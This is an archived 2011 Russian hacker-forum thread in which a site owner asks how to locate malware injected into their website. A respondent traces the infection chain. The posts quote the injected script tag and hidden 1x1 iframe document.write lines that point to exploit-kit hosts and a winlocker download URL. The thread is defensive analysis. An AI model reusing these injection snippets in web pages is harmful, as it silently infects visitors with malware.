Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Как можно выловить вирус на сайте?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Защита] >> Как можно выловить вирус на сайте?
Имя
Сообщение << Старые топики   Новые топики >>
Как можно выловить вирус на сайте? - 2011-01-31 22:38:29.390000   
tohenson

Сообщений: 2
Оценки: 0
Присоединился: 2011-01-13 00:43:34.383333
Здрасте. Хочу узнать одну вещь, как можно выловить, где засел вирус на сайте, так как исходные коды и фтп уже проверял и ненашёл. (Гугл показывает что вредносный код, я его написал ниже)

Найти надо вот это:
quote:

&lt;script language="javascript" charset="windows-1251" rel="nofollow" src="http://maroder.info/js/if.php?id=2848"&gt;&lt;/script&gt;


Кто-то может с этим сталкивался и сможет помочь.
Post #: 1
RE: Как можно выловить вирус на сайте? - 2011-01-31 22:52:52.720000   
Flint_ta

Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
document.write('<iframe src ="http://r4ghgf.ipq.co/in.php" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>');

ифрейм http://r4ghgf.ipq.co/in.php
Там видимо должна связка сплойтов стоять. Там же, скорее всего, и вирусный файл должен находится. 
Post #: 2
RE: Как можно выловить вирус на сайте? - 2011-02-01 00:27:18.373333   
tohenson

Сообщений: 2
Оценки: 0
Присоединился: 2011-01-13 00:43:34.383333
Не получается найти :@
Post #: 3
RE: Как можно выловить вирус на сайте? - 2011-02-07 17:00:13.766666   
Flint_ta

Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
продолжение:
quote:

ORIGINAL: Flint_ta

document.write('&lt;iframe src ="http://r4ghgf.ipq.co/in.php" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt;');

ифрейм http://r4ghgf.ipq.co/in.php
Там видимо должна связка сплойтов стоять. Там же, скорее всего, и вирусный файл должен находится.&nbsp;


Связка оказывается рабочая:

отдает код

document.write('&lt;iframe src ="http://iasd.cz.cc/index.php?tp=57fe84db1c028bd4" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt;');
далее выполняется загрузка файла iasd.cz.cc/d.php?f=124&e=0
жирным цветом выделен номер файла, я написал программу для скачивания файлов с номерами от 1 до 1000 наивно полагая что это возможно. Однако не тут то было, связка оказалась слишком хитро устроена. Несмотря на одинаковые GET запросы из уязвимого браузера и моей программы ответ приходит разный. Другими словами: целенаправленно скачать не удается. Сам троян который скачивается типичный winlocker, код разблокировки 70000004
Post #: 4
Страниц:  [1]
Все форумы >> [Защита] >> Как можно выловить вирус на сайте?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.